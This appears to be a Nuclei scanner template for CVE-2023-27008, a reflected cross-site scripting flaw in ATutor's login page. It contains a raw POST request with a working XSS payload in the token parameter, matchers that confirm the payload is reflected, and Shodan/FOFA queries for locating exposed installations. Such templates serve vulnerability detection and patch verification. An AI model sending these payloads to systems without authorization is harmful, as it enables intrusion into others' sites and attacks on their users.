id: CVE-2023-27008 info: name: ATutor < 2.2.1 - Cross Site Scripting author: r3Y3r53 severity: medium description: | ATutor < 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade ATutor to version 2.2.2 or above to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-27008 - https://plantplants213607121.wordpress.com/2023/02/16/atutor-2-2-1-cross-site-scripting-via-the-token-body-parameter/ - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-27008 cwe-id: CWE-79 epss-score: 0.00133 epss-percentile: 0.48375 cpe: cpe:2.3:a:atutor:atutor:2.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: atutor product: atutor shodan-query: - http.html:"Atutor" - http.html:"atutor" fofa-query: body="atutor" tags: cve,cve2023,xss,atutor http: - raw: - | POST /atutor/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded token=asdf");}alert(document.domain);+function+asdf()+{// matchers-condition: and matchers: - type: word part: body words: - ");}alert(document.domain); function" - "ATutor" - "Login" condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a0047304502207dc8656d646b7b14e075f0e7b4656ce61aaf7b2371f75c6c2c1b8a5445c399f4022100b4c39a836c6c147f818076bad19a1565e21fb5bac16ebfe8fdb050b6980d4264:922c64590222798bb761d5b6d8e72950